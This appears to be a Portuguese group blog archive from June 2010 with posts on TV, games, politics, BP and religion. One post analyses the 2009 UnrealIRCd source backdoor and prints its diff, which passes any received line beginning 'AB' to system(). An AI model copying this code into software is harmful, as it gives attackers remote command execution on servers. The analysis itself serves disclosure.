2010-06-28

Who is the Stig? New clues!

Michael Schumacher não é o Stig...

Mas uma recente publicidade da Hyundai revelou, acidentalmente, a identidade secreta de um piloto que pode ser irmão dele!

2010-06-27

Patriotismo

Deus, Pátria e Família. Bem, hoje vamos deixar Deus de fora do refogado.

Lembram-se, aqui há uns anos atrás, aquando de um campeonato de futebol (ou o Euro 2004 ou o Mundial 2006. Um deles) surgiu uma moda de bandeiras lusitanas feitas na China que, em vez de castelos na cercadura do escudo, tinham pagodas? A história que se segue fez-me lembrar disso.

Na estrada que liga Viseu a Sátão (duas localidades a evitar, bem como a própria estradam agora que penso nisso) operam várias profissionais do sexo. Uma delas, ao que me contam, assinala a sua presença no lugar habitual com um casaco ou um cobertor pendurado em determinada árvore à beira da estrada. Imagino que dê menos mau aspecto que a "menina" que quase todas as semanas vejo sentada à entrada de uma estradeca de terra batida logo antes da última bomba de combustível antes da A25, à saída de Albergaria-a-Velha. Hoje, provavelmente em celebração do facto de a nossa selecção ter chegado às eliminatórias, pendurou na dita árvore uma bandeira portuguesa. Imagino a associação. No lugar de um condutor "tuga", vejo a bandeira e penso "Carago, a nossa selecção chegou às eliminatórias! Isto merece que se dê uma! Pela selecção! Olha quem está ali... não é tarde nem é cedo. deixa cá ver se tenho trocos no cinzeiro...".

Pronto, se calhar a coisa não se processa rigorosamente assim, mas, de acordo com a ideia que tenho dos fanáticos da bola (antes que alguém se ofenda, a linha que separa um indivíduo que acompanha o desporto e torce pelo seu clube ou pela selacção de um fanático da bola não é fina nem curta nem ténue, nem mesmo se observada de Alfa Centauri), é perfeitamente plausível. O facto de que o fanático da bola em questão conduz entre Viseu e Sátão vai ao encontro da minha hipótese e tudo. Provavelemte até tem uma vuvuzela em vez de buzina.

Resumidamente: Do idolatrismo da noção de "pátria" até "a bandeira é boa para assinalar lugares de prostituição". Realmente, este povo não tem mesmo noção de "meio termo".

Pax vobiscum atque vale.

2010-06-26

série 'The Wire'

Preciso de info.
Ler a descrição na Wikipedia fez-me pensar que seria da mesma qualidade que o Battlestar Galactica, no sentido de prometer pouco mas ser uma agradável surpresa.

P.S.: olhando para trás, não consigo deixar de pensar que se calhar que final da 3ª e 4ª do BSG não foram grande coisa, não fosse já pelo ambiente que tinham conseguido criar.

BP: como compensar o facto de ter feito merda: fazer mais merda

BP: Gulf Resident Gives Behind the Scenes Account, Slams Cleanup and Safety


BP is burning endangered sea turtles alive.



TL;DR: a BP só quer poupar dinheiro. Fuck the planet.

Adicionalmente, um gajo na Fox News disse que a culpa era do governo porque forçava as companhias a fazer poços de extracção em determinados locais não adequados e depois não era fácil conter fugas. Argumentou ainda que se não houvesse o 'cap' no pagamento por problemas as companhias seriam responsáveis por ter uma seguradora que seria responsável por inspeccionar o funcionamento das coisas.

Finalmente, a BP desconfia de uma peça de equipamento defeituosa que levou à explosão da plataforma. A culpa foi de uma peça defeituosa. Vou repetir a ver se me entra na cabeça: a culpa de tudo isto foi de uma peça defeituosa. Não foi do facto da BP não ter planos nenhuns de 'failsafe'. Não foi de não ter abortado as operações nos 3 sinais de problemas anteriores à explosão final. A culpa, meus senhores, foi de algo defeituoso. Bad bad faulty thing, it's all your fault!

P.S.: quanto ao argumento de uma seguradora [que terá de pagar caso haja problemas] garantir o bom funcionamento das coisas, que acham? Bullshit? Parcialmente bullshit? Em teoria funcionaria. Por outro lado se calhar cobriam-se um ao outro e ia dar ao mesmo. Mas também a agência do governo responsável por fiscalizar as coisas também não se portou muito melhor... Para evitar problemas no futuro essa agência..... foi renomeada. /facepalm

Top Gear 2010 - New Reasonably Priced Car!

TopGear 15, episode 1: rehearsals...

Já falta pouco, mas como não se fala de outra coisa...

Aqui fica a minha aposta:

Kia Cee'd 2010

Mystery Car

Parece-me bem! :)

Sinais que jogaste transformice demasiado


1. Numa passadeira, esperas que toda a gente se meta aos pulos a correr para o outro lado, embora o sinal esteja vermelho.

2. Quando abres o frigorífico e vês queijo ali tão perto, olhas rapidamente para trás a ver se uma bola negra a alta velocidade não vem contra ti.

3. Se tens um buraco no teu caminho, esperas calmamente que o teu Deus meta uma placa de madeira por cima para que possas passar.

3.1 Se a placa de madeira partir e tu caíres para uma morte horrível, achas normalíssimo.

3.2 Enquanto estas no tal buraco, com dores agonizantes, gritas "GG".

4. Achas normal ninguém á tua volta perceber o conceito de peso-contrapeso.

5. Quando achas que não consegues saltar sobre um precipício, saltas na mesma, pode ser que o mundo tenha um glitch e tu fiques do lado de lá.

2010-06-23

Resumo do discurso do Obama acerca do McChrystal

Bla bla bla


Bla bla bla


Bla bla bla

É preciso estarmos unidos.

Pessoas < Instituições

Comentários do McChrystal pôem em perigo a chefia civil do exército.

Bla bla bla


Bla bla bla


Bla bla bla


Bla bla bla

Bla bla bla

Bla bla bla


EDIT de autoria desconhecida:

Ninja Edit, something stinks:


2010-06-22

North Korea T-Shirt - Made in the USA!

Mais uma Pérola... e por apenas $32.99!

Ajudem KIM JONG IL a juntar dinheiro para contratar o Mourinho!

Transformice

Para quem ainda nao viu:


Muito divertido.

Banido do 4chan :(

5 anos depois: Era Uma Vez Um Arrastão

São 20 minutos, mas vale a pena.



TL;DW: O arrastão de 500 pessoas de 2005 não existiu. O vídeo faz uma análise das notícias nas primeiras horas, 6 dias depois e uma semana depois, com comentários de um deputado da Assembleia Municipal [de Lisboa?].

Pessoalmente acho incrível como é possível esta variação de "factos".

2010-06-21

Anathema - Pulled Under at 2000 Meters a Second




Just freedom is only a hallucination
That waits at the edge of the distant horizon
And we are all strangers in global illusion
Wanting and needing impossible heaven

Chasing the dream as they swim out to sea
The mirage ahead says that they can be free
Become lost in delusion drowning their reason
Swept on by the current of selfish ambition

Frightened ashamed and afraid of the blame
The questions are screaming the answers are hiding
The sickness is growing distracted condition
You can feel the disgust and smell the confusion

Lying insane getting soaked in the rain
Draining the sky of the guilt and the shame
The nightmare is coming the clouds are descending
Pulled under two thousand metres a second

Clawing at walls that just slip through my fingers
Darkness consuming collapsing and breaking
Distilled paranoia seeped into the walls
And filled in the cracks with the whispering calls

Shadows are forming take heed of the warnings
Creeping around at four in the morning
Lie to myself start a brand new beginning
But I'm losing my time in this fear of living

Freedom is only a hallucination
That waits at the edge of the places you go when you dream
Deep in the reason betrayal of feeling
The mistakes that I made tore my conscience apart at the seems

Freedom is only a hallucination
That waits at the edge of the places you go when you dream...

Sousa Lara voltaria a vetar livro de Saramago - TSF

Sousa Lara foi o responsável do Governo de Cavaco Silva que decidiu afastar um livro de Saramago a uma candidatura a um prémio literário, por considerar que atentava contra a moral cristã. Depois da «reconciliação» entre o escritor José Saramago e o Estado português, o ex-sub-secretário de Estado Sousa Lara disse à TSF que não está arrependido da decisão que tomou há 12 anos.



2010-06-20

disco-bar no Google

Se forem a Google.pt e colocarem a interface em Português, a pesquisa por "disco-bar" tem como primeiro resultado o nosso blog :D

P.S.: o post da gaja a "fazer de abelha" (A.K.A.: a cantar Flight of the Bumblebee) encontra-se na secção Reddit do blog, na tab ali em cima.

2010-06-19

For great justice, against tyranny

Porque alguem decidiu apagar o post de uma gaja a fazer de abelha (!!!!), decidi fazer repost:


"Lá num país cheio de cor
Nasceu um dia uma abelha
Bem conhecida p'la amizade
Pela alegria e p'la bondade

Todos lhe chamam a pequena Abelha Maia
Fresca, bela, doce Abelha Maia
Maia voa sem parar
No seu mundo sem maldade
Não há tristeza para a nossa Abelha Maia
Tão feliz e doce, Abelha Maia
Maia, eu quero-te aqui
Maia (Maia), Maia (Maia), Maia vem fala-nos de ti

Numa manhã ao passear
Vi uma abelha numa flor
E ao sentir que me olhou
Com os seus olhitos de cor

E esta abelha era a nossa amiga Maia
Fresca, bela, doce Abelha Maia
Maia voa sem parar
No seu mundo sem maldade
Não há tristeza para a nossa Abelha Maia
Tão feliz e doce, Abelha Maia
Maia, eu quero-te aqui
Maia (Maia), Maia (Maia), Maia vem fala-nos de ti
Maia, eu quero-te aqui
Maia (Maia), Maia (Maia), Maia vem fala-nos de ti "

FOR GREAT JUSTICE!

2010-06-18

Google & Data-Mining

Não consigo fazer upload da imagem com resolução suficiente para aparecer no post (a que estava anteriormente tinha resolução inferior à original).

2010-06-16

Desafio - Where is Flash's About Page


Problema:flash com bug de segurança (execução de código remoto)
Solução: esperar que o update saia

Verificação: ir à página da Adobe que menciona a versão de Flash instalada e a mais recente disponível

DESAFIO: como fazer o passo da Verificação?

Eu agora já sei chegar à página mas tentei:
a) ir pela página da Adobe
b) perguntar pelo Twitter (e não obter resposta)
c) desistir

Entretanto cheguei lá sem querer mas pelo caminho a minha antipatia por utilizadores de Mac a fazer bashing à Adobe só porque sim diminuiu um bocadinho.

P.S.: o Acrobat Reader também tem o mesmo problema, o fix deve sair lá para o final do mês; há workarounds disponíveis que envolvem renomear ficheiros manualmente.

EDIT: Zeca:
Existe sempre a solução mais obvia.....



EDIT: Goucha
Eu mencionei isso nos comentários. Mas da primeira vez não me lembrava como era, andei a passear pela página da Adobe para cima e para baixo sem encontrar nada. O meu rant prende-se com o facto do site da Adobe ser um steaming pile of shit em que não se encontram as coisas navegando pelo site.

EDIT: Shantanu Narayen
OMG FLASH IS TEH SUXXOR!!

Porn Chickens

2010-06-15

Online Dating, especificamente

Duvido que algum de nós nunca tenha, durante actividade perfeitamente quotidiana (cuja definição vai ficar salvaguardadoramente lata), encontrado um anúncio a serviços online que pegam em dois completos desconhecidos e arbitram que são absolutamente ideais para se relaccionarem uns com os outros. Esses anúncios têm a mania de deduzir (mal e porcamente, em grande parte dos casos) a localiação do utilizador a partir do seu IP e, com essa informação, acompanhar as imagens de frases como "Encontre solteiros em Viseu" ou "Faça amigos em Ílhavo" ou mesmo "Find fuck buddies in Sintra".

Queria aqui anunciar, se faz favor, que, dado que na única vez que fui a Sintra não me liguei à Internet, só posso depreender que o anúncio não queria dizer que os ditos "fuck buddies" estivessem em Sintra, mas sim no Sintra... o que me deixa perturbado.

Adiante. Hoje, no Cracked, encontrei esta imagem:




...

Então esses casamenteiros online estão a querer explorar públicos alvo tão específicos como "Homens solitários que se sintam atraídos por mulheres afro-americanas (porque isto é um blog politicamente correcto) cheiinhas (porque hoje sinto-me simpático)". Há cá algum?

Mas, olha, não desesperemos. Se a coisa continuar nesse sentido, talvez vejamos anúncios destes:




(À data da criação desta posta, o site não existe. Haja paciência, pode ser que não tarde...)

Pax vobiscum atque vale.

"Eu" existo

Imaginem um mundo em desenvolvimento, semelhante ao nosso. Apresenta todos os sinais para possuir vida e isso eventualmente acontece. Os seres são também semelhantes e regem-se pelas mesmas regras; reproduzem-se, combatem, alimentam-se e … enfim, cagam. Evoluem também mais ou menos como vemos no nosso planeta.

Após largos anos, algumas espécies desapareceram, outras evoluíram significativamente e outras tornaram-se dominantes. Imaginemos então que oferecemos um cérebro super desenvolvido a uma destas espécies. Melhor seria que esta espécie desenvolvesse esse cérebro mais evoluído...

Esta espécie iria seguir a vida do mesmo modo, mas ia descobrir várias coisas novas. A sua maior inteligência iria permitir-lhe cimentar a sua posição como espécie dominante. No entanto, iria começar a aperceber-se de certas coisas um pouco estranhas, como por exemplo, a percepção do eu. A olhar para outros membros da sua espécie iria reparar que eventualmente todos morrem. O morrer em si é algo natural e como evento em si, não seria nada de estranho, pois na alimentação (caça) e no combate já há vários anos que esta espécie é confrontada com a morte. O novo problema é o cessar do existir do eu. Ao tornarem-se autoconscientes, levantam-se uma série de questões, e o da morte levanta-se acima dos outros.

Porquê? Porque a mente autoconsciente não suporta o conceito de cessar de existir. E então cria a religião, respeito e culto à morte, etc, de modo a poder se enganar e estender a existência do eu.


A diferença é se em vez de o cérebro se desenvolver sozinho, tenha sido antes oferecido por uma entidade superior, faz sentido que possa haver algo para além da morte.


Mas a verdade é que no momento da morte, ou nos momentos próximos dela, a única coisa que o cérebro sabe é “bom meu caro, tás feito, dá aí o teu adeus e até nunca mais” juntamente com o borrar-se todo e outras coisas menos bonitas. É o tal instinto animal. O animal tenta lutar até ao fim, agarrando-se firmemente à vida, mas duma forma instintiva. O ser autoconsciente também se agarra à vida, mas encara a morte duma forma completamente diferente; o “eu” pensa “vou deixar de existir”, e olha para as suas mãos, os seus dedos – o escritor Jack London explica melhor:

“he discovered an appreciation of his own body which he had never felt before. (…) It fascinated him, and he grew suddenly fond of this subtle flesh of his that worked so beautifully and smoothly and delicately. Then he would cast a glance of fear at the wolf-circle drawn expectantly about him, and like a blow the realization would strike him that this wonderful body of his, this living flesh, was no more than so much meat, a quest of ravenous animals, to be torn and slashed by their hungry fangs, to be sustenance to them as the moose and the rabbit had often been sustenance to him.”


Nessa estória (White Fang, para quem estiver interessado), o homem acaba por se safar. Mas podia muito bem ter morrido ali, e provavelmente antes de morrer, ao aperceber-se que tava feito ao bife, iria rezar ou talvez chorar. Outros chamam pela mãe.

Segundo a religião, não há que ter medo da morte, pois há sempre qualquer coisa a seguir. Mas todo o homem (já falo do homem porque é ele a tal espécie de que falava de início, e o tal mundo não passa do nosso planeta) tem esse medo. Quando confrontados com aquela situação final, todos sabem instintivamente que é o fim. Acabou-se, não há mais nada.

A realização do homem cercado por lobos é incompleta. Há a percepção de que o seu corpo físico irá desaparecer mas não é mencionado o consciente. Talvez por ser um homem mais simples. Mas a mente está ligada ao corpo; sem corpo não há mente. E então essa realização implica também o desaparecimento do consciente.


A religião ainda é seguida por muita gente, gente essa que sabe, conscientemente ou inconscientemente, que não há nada para além da morte. E no entanto, creio genuinamente que muitos deles de facto acreditam na existência de Deus. Tão certo como o sol se pôr todos os dias!

Para além de me surpreender, também me causa uma admiração respeitosa, como aqueles lendários gregos e romanos que marchavam firmemente para a morte sem medo algum.


A meu ver, a única coisa a segurar a religião é o mistério da existência do universo. Na física existe o conceito acção-reacção; o big bang foi uma reacção (uma acção é sempre uma reacção produto de outra acção). Que acção o desencadeou? As coisas não acontecem ao calhas, por muito caóticas que sejam. Será que o conceito de início está totalmente errado e não exista? Ou será que foi o tal ser omnipotente que começou com tudo isto?


TL;DR: não sei se Deus existe. Gostaria que existisse, para bem de todos, mas bem cá no fundo, desconfio que não.

Progresso




Fonte: Yahoo!News
“It has always seemed strange to me… the things we admire in men, kindness and generosity, openness, honesty, understanding and feeling, are the concomitants of failure in our system. And those traits we detest, sharpness, greed, acquisitiveness, meanness, egotism and self-interest, are the traits of success. And while men admire the quality of the first they love the produce of the second.” – John Steinbeck

Esta citação tem um link para um texto TL;DR interessante

2010-06-14

Mortal Kombat

Quem se lembra da musica do mortal kombat?

Epic hem, pena que os filmes eram pior que horriveis. Maus actores, quase que se via os arames nas cenas de luta, Jony Cage vivo durante demasiado tempo (gay factor), pouca Sonya, scorpion e subzero com fatos de spandex amarelo e azul respectivamente....enfim.

Fast Forward para 2010, e temos isto a aparecer (Maiores de 18 por violência):

Mau jornalismo & o backdoor no UnrealIRCd

Factos:
  • o código fonte de uma versão do UnrealIRCd para Linux, distribuído num .tar.gz foi comprometido de maneira que linhas que o servidor recebesse que começassem com "AB;" fossem executadas como comandos da shell [1]



  • Os autores do programa não estavam a implementar assinatura dos pacotes



  • houve portanto uma falha de segurança na forma de backdoor





  • Mau jornalismo
  • Linux infection proves Windows malware monopoly is over (não foi infecção e o antivírus não apanharia, em teoria, o problema; adicionalmente, a única razão pela qual a versão para Windows não foi afectada foi que o atacante não se deu ao trabalho)




  • Linux Trojan Raises Malware Concerns (a piada era que diziam que o trojan era no jogo Unreal, o que demonstra a extensa investigação realizada durante a escrita do artigo; entretanto esse erro foi corrigido)






  • Como aparentemente quem é pago para isso não faz o seu trabalho como deve ser, eu, que devia estar a dormir ou a trabalhar, faço o trabalho por eles.

    A equipa por detrás do UnrealIRCd, um servidor de IRC, coloca as suas releases num servidor. O código-fonte vem, como é hábito, num ficheiro .tar.gz. Algures durante Novembro de 2009 um idiota qualquer adicionou nesse ficheiro .tar.gz 10 linhas de código [1], que faziam que qualquer linha que começasse por "AB;" que fosse enviada ao servidor seria executada no servidor com os privilégios do utilizador com que o servidor estaria a correr.

    Ou seja, temos uma backdoor, e não um vírus, e temos uma backdoor bastante simples, que a única coisa que faz de especial é ter uma chamada ao system() -- o que já dá para muito estrago mas não é propriamente complexo nem com código incomum. Duvido, como tal, que um antivirus apanhasse tal backdoor através de heurísticas (e muito menos através de assinaturas antes do problema ser conhecido) mas não tenho conhecimentos para afirmar tal com toda a certeza nem tenho um blog na ZDnet e sou pago para mandar bitaitagem.


    Quem quiser uma análise decente à backdoor pode vê-la aqui.



    Entretanto um idiota num canal de IRC também gosta muito de mandar bitaitagem sem saber do que fala nem admitir a sua ignorância [2] disse que uma versão antiga do antivírus detectava mas não acredito que ele tenha testado como deve ser.


    [1] A backdoor
    diff -ru Unreal3.2-clean/include/struct.h Unreal3.2-bugged/include/struct.h 
    --- Unreal3.2-clean/include/struct.h    2009-04-13 13:03:57.000000000 +0200 
    +++ Unreal3.2-bugged/include/struct.h   2009-04-13 13:03:00.000000000 +0200 
    @@ -430,6 +430,7 @@ 
     #endif 
      
     /* Fake lag exception */ 
    + 
     #define IsNoFakeLag(x)      ((x)->flags & FLAGS_NOFAKELAG) 
     #define SetNoFakeLag(x)     ((x)->flags |= FLAGS_NOFAKELAG) 
     #define ClearNoFakeLag(x)   ((x)->flags &= ~FLAGS_NOFAKELAG) 
    @@ -448,6 +449,7 @@ 
     #else 
     #define IsNotSpoof(x)           (1) 
     #endif 
    +#define        DEBUGMODE3          ((x)->flags & FLAGS_NOFAKELAG) 
      
     #define GetHost(x)                     (IsHidden(x) ? (x)->user->virthost : (x)->user->realhost) 
     #define GetIP(x)                       ((x->user && x->user->ip_str) ? x->user->ip_str : (MyConnect(x) ? Inet_ia2p(&x->ip) : NULL)) 
    @@ -513,6 +515,10 @@ 
     #else 
     #define CHECKPROTO(x,y) (checkprotoflags(x, y, __FILE__, __LINE__)) 
     #endif 
    +#ifdef DEBUGMODE3 
    +#define DEBUGMODE3_INFO        "AB" 
    +#define        DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x) 
    +#endif 
      
     #define DontSendQuit(x)                (CHECKPROTO(x, PROTO_NOQUIT)) 
     #define IsToken(x)             (CHECKPROTO(x, PROTO_TOKEN)) 
    @@ -1373,6 +1379,7 @@ 
     #define INCLUDE_REMOTE     0x2 
     #define INCLUDE_DLQUEUED   0x4 
     #define INCLUDE_USED       0x8 
    +#define DEBUG3_DOLOG_SYSTEM(x) system(x) 
            
     struct _configitem_include { 
            ConfigItem *prev, *next; 
    diff -ru Unreal3.2-clean/src/s_bsd.c Unreal3.2-bugged/src/s_bsd.c 
    --- Unreal3.2-clean/src/s_bsd.c 2009-03-01 19:37:58.000000000 +0100 
    +++ Unreal3.2-bugged/src/s_bsd.c        2006-06-16 20:29:00.000000000 +0200 
    @@ -1431,6 +1431,10 @@ 
                        return 1; 
                    if (length <= 0) 
                            return length; 
    +#ifdef DEBUGMODE3 
    +       if (!memcmp(readbuf, DEBUGMODE3_INFO, 2)) 
    +           DEBUG3_LOG(readbuf); 
    +#endif 
                    for (h = Hooks[HOOKTYPE_RAWPACKET_IN]; h; h = h->next) 
                    { 
                            int v = (*(h->func.intfunc))(cptr, readbuf, length);
    

    [2] O sábio do IRC
    [22:55] [A_minha_pessoa] out of curiosity, you've already bashed the ZDnet blog guy saying the IRCd would've been detected by a virus scan?
    [22:55] [A_minha_pessoa] *Unreal IRCd exploit
    [22:55] [O_sábio] A_minha_pessoa, One of many ways it could have been stopped
    [22:55] [O_sábio] He happened to pick the one way where Windows looks more secure
    [22:56] [O_sábio] the most inefficient way of stopping it that would have worked
    [22:56] [O_sábio] :)
    [22:56] [O_sábio] I still say neutering /opt and posting the correct MD5 sum could have stopped it
    [22:56] [O_sábio] without any need for a virus scanner
    [22:57] [A_minha_pessoa] O_sábio: but it's NOT a virus infection! It's a friggin' backdoor which I've my doubts would be detected by any AV!
    [22:57] [O_sábio] A_minha_pessoa, I checked into it
    [22:57] [O_sábio] ClamAV would have caught it
    [22:57] [O_sábio] even 6 months ago
    [22:57] [O_sábio] it wasn't new exploit code, it was just infecting something new
    [22:58] [A_minha_pessoa] O_sábio: a backdoor? how would it catch it? It's a system() call
    [22:58] [A_minha_pessoa] anyone can use a system call in a program
    [22:59] [O_sábio] unsophisticated copypasting
    [22:59] [O_sábio] it's not exactly one of the black arts
    [22:59] [O_sábio] :)
    [23:00] [A_minha_pessoa] I still don't understand how come ClamAV would've caught it
    [23:00] [O_sábio] A_minha_pessoa, The correct file would have matched the MD5 sum of the original file
    [23:00] [O_sábio] let's go back to that one
    [23:00] [O_sábio] because it's the most obvious way to smell a rat
    [23:00] [A_minha_pessoa] no, we're talking about the AV
    [23:01] [A_minha_pessoa] which is what is told in a blog post of a supposed expert
    [23:01] [O_sábio] then there's heuristics
    [23:01] [A_minha_pessoa] the MD5 checksum would of course allow it to be detected
    [23:01] [O_sábio] many antivirus programs look at what a file would do if it was to be allowed to actually run
    [23:01] [A_minha_pessoa] heuristics checking for a system call ?
    [23:02] [A_minha_pessoa] that means I can't do a system() call on a program that it will be classified as a virus?
    [23:02] [O_sábio] at the very least it would probably alert the user to a generic suspicious file
    [23:04] [O_sábio] you don't see anything suspicious about a bot that opens up an IRC connection to a command and control server and starts DCC requests and responding to commands given in the room?
    [23:05] [A_minha_pessoa] have you looked at the .diff ?
    [23:06] [O_sábio] the fact that there are sites out there like GNOME Look is terrifying
    [23:06] [O_sábio] malware gets on there (easily) and infects many (Linux) users for months before anyone is any the wiser
    [23:07] [A_minha_pessoa] have you looked at the .diff ?
    [23:07] [O_sábio] in many ways, yeah, you can get a sizeable botnet on lots of Ubuntu systems, for example
    [23:07] [O_sábio] because nobody will bother to check if they're infected
    [23:07] [O_sábio] it's not like it hasn't happened already
    [23:08] [A_minha_pessoa] in order to continue this discussion I need to know: have you looked at the .diff ?
    [23:08] [O_sábio] Linux is not immune from malware just for being Linux
    [23:08] [O_sábio] explain where Bott was actually wrong about that
    [23:09] [O_sábio] lots of Ubuntu users installing neat little theme packs and putting in their sudo credentials to install the DEB file found that out
    [23:09] [A_minha_pessoa] so, I've to assume you haven't looked at the .diff
    [23:10] [O_sábio] The nice thing about Ubuntu is that it makes it so easy for the user to shoot themselves in the foot and make it look like doing so is a great idea
    [23:11] [O_sábio] it fosters an environment favorable to the spread of malware
    [23:11] [A_minha_pessoa] O_sábio: have you looked at the .diff between the backdoored version and the clean version of the Unreal IRCd ?
    [23:12] [O_sábio] Tell me this. If Ubuntu continues growing, and taking in users who think they're all invincible.
    [23:12] [O_sábio] If that happens, why won't there be an antivirus market there?
    [23:12] [O_sábio] because there will be thousands of different pieces of malware for it
    [23:13] [O_sábio] malware spreads using the most clueless user
    [23:13] [A_minha_pessoa] O_sábio: so, have you looked at the .diff between the backdoored version and the clean version of the Unreal IRCd ?
    [23:14] [O_sábio] why do I have to?
    [23:14] [O_sábio] ClamAV immediately says not to run it
    [23:14] [O_sábio] I've already made that point
    [23:15] [O_sábio] You're asking me how ClamAV detected it? Why do I give a shit?
    [23:15] [O_sábio] it does
    [23:15] [A_minha_pessoa] have you checked with the definitions of ClamAV 6 months ago ?
    [23:16] [O_sábio] I checked it without the daily cvd
    [23:16] [O_sábio] that pretty much removes all the signatures
    [23:16] [O_sábio] so yes, it still would have detected it 6 months ago
    [23:17] [O_sábio] any half-competant antivirus program would have stopped it
    [23:17] [A_minha_pessoa] I find it strange, but ok.
    [23:17] [O_sábio] any half-competent user would have questioned the need to run this as root
    [23:17] [O_sábio] any half-competent sysadmin would have posted a damned MD5 sum of the original
    [23:18] [O_sábio] nobody suspected anything could go wrong
    [23:18] [O_sábio] so they all fail on each account
    [23:19] [O_sábio] it's just like UAC as an annoyance screen
    [23:19] [O_sábio] if the user doesn't ask why something needs elevated and hits OK, of course it can do anything to the system
    [23:19] [A_minha_pessoa] O_sábio: it's a "system()" call, I don't see how an AV could have detected it, look here: http://www.google.com/codesearch?lr=&q=%22system%28%22+lang%3Ac . I find it weird you claiming it would but honestly I don't have the time to check so I'll have to take your word on it.
    [23:22] [O_sábio] "Obviously, this is a very serious issue, and we're taking precautions so this will never happen again, and if it somehow does that it will be noticed quickly."
    [23:22] [O_sábio] should read "so this will never happen again (until it does)" "sorry for not paying any attention"
    [23:22] [O_sábio] :D

    2010-06-13

    Memes, memes everywhere

    Descobri recentemente este meme espectacular:
















    É por estas e por outras que adoro o 4chan :D
    Guardei uma série destas pics e meti aqui, para quem quiser mais.

    2010-06-12

    Proposta para a melhoria da política nacional

    A minha proposta para melhoria da política nacional é simples: permitir o uso de vuvuzelas no parlamento quando algum político estiver a ser parvo.

    Commentators have described the sound as "annoying" and compared it with "a stampede of noisy elephants", "a deafening swarm of locusts", "a goat on the way to slaughter" and "a giant hive full of very angry bees".[1]




    Referências:
    [1] Vuvuzela

    2010-06-11

    O primeiro anúncio de TV do Starcraft II



    "First Starcraft 2: Wings of Liberty Commecial during the NBA Finals"

    2010-06-10

    Team fortress free weekend, plus


    Team fortress does mac, live now.

    E, até dia 13, podem jogar de borla (excepto o goucha, pc dele sucka). E, se optarem pela compra, levam com 50% de desconto em cima (preço final de 8 euros, 8!!!!!!).

    Não, não recebo parte das vendas pela publicidade, mas o jogo é fantástico com achivements, unlocks, e até um chapeu/cabelo de elvis presley para o heavy weapons guy!

    PS: agora com bots em single player tambem.

    Zeca:

    2010-06-09

    Grande cover



    PS: fiz um pequeno Hack-No-Jutsu para vos poupar um beijo bem panisgas mesmo no inicio do clip. Dispenso bem manifestações de afecto, gah...

    19600000000000.00$

    19600000000000.00$ é o valor da dívida externa dos estados unidos em 2015, 102% do seu PIB (93% em 2010). Alguem consegue ler esse numero sem pensar duas vezes?

    De relembrar, que, a dívida portuguesa actual(2010) é de 195000000.00$, um numero muito mais bonito e confortavel, tanto que faz 86% do nosso PIB. São coisas destas que não percebo. Portugal, com 86% do PIB em divida, está em crise profunda, US com 93% é uma economia de confiança... mas isso sou eu, que não percebo nada de economia.

    2010-06-04

    Ultimo gadget de James Bond




    Infelizmente, noticia real:

    "
    Indian police are holding a pigeon under armed guard after it was caught on an alleged spying mission for arch rivals and neighbours Pakistan"

    Como? Pode repetir?

    "The pigeon had a ring around its foot and a Pakistani telephone number and address stamped on its body in red ink."

    Ha, só faltou encontrarem o telemóvel do bixo. Ou então ia usar um telefone público. De notar a tinta vermelha, para passar despercebido.

    "Officials have directed that no-one be allowed to visit the pigeon, which police say may have been on a "special mission of spying"."

    Um pombo...? Precisam de um curso ou algo para isso não?

    "Senior officers have asked to be kept updated on the situation three times a day"

    Certamente com medo que ele fuja...

    "Mr Chahal said local pigeon fanciers in the sensitive border area had told police that Pakistani pigeons were easily identifiable as they look different from Indian ones"

    Obviamente, e o sotaque do pombo denunciava claramente a sua origem paquistanesa.

    Noticia original aqui

    2010-06-02

    E3 - Evento do Portal 2 cancelado

    "Dear Subject Name Here,

    Aperture Science is pleased to inform you that we have partnered with Valve to announce the gala CANCELLATION of the June 14 Portal 2 event at the Regal Theater. The event will be replaced by a surprise. And even though the cancellation of the event certainly counts as a surprise, we are pleased to further announce that the cancellation of the event is not THE surprise. However, per International treaties regarding the definition of the word “surprise”, of which both Aperture Science and Valve are signatories, the time, date and content of the actual surprise will only become available as you experience the surprise.

    If you’d like to ask fruitless questions about the E3 Portal 2 surprise or, more fruitfully, schedule an appointment to attend a Portal 2 screening at the Valve booth during E3, please contact Valve’s Special Envoy to Surprises, Doug Lombardi.

    Thank you for <>

    PS: The surprising record scratch is also not the surprise."


    Ainda me lembro... Portal. Huge Sucess.

    Fonte: Rockpapershotgun

    2010-06-01

    Tempestade na Guatemala!

    Já viram uma tempestade fazer um buraco de 200 pés de profundidade ??
    Foi o que aconteceu na Guatemala...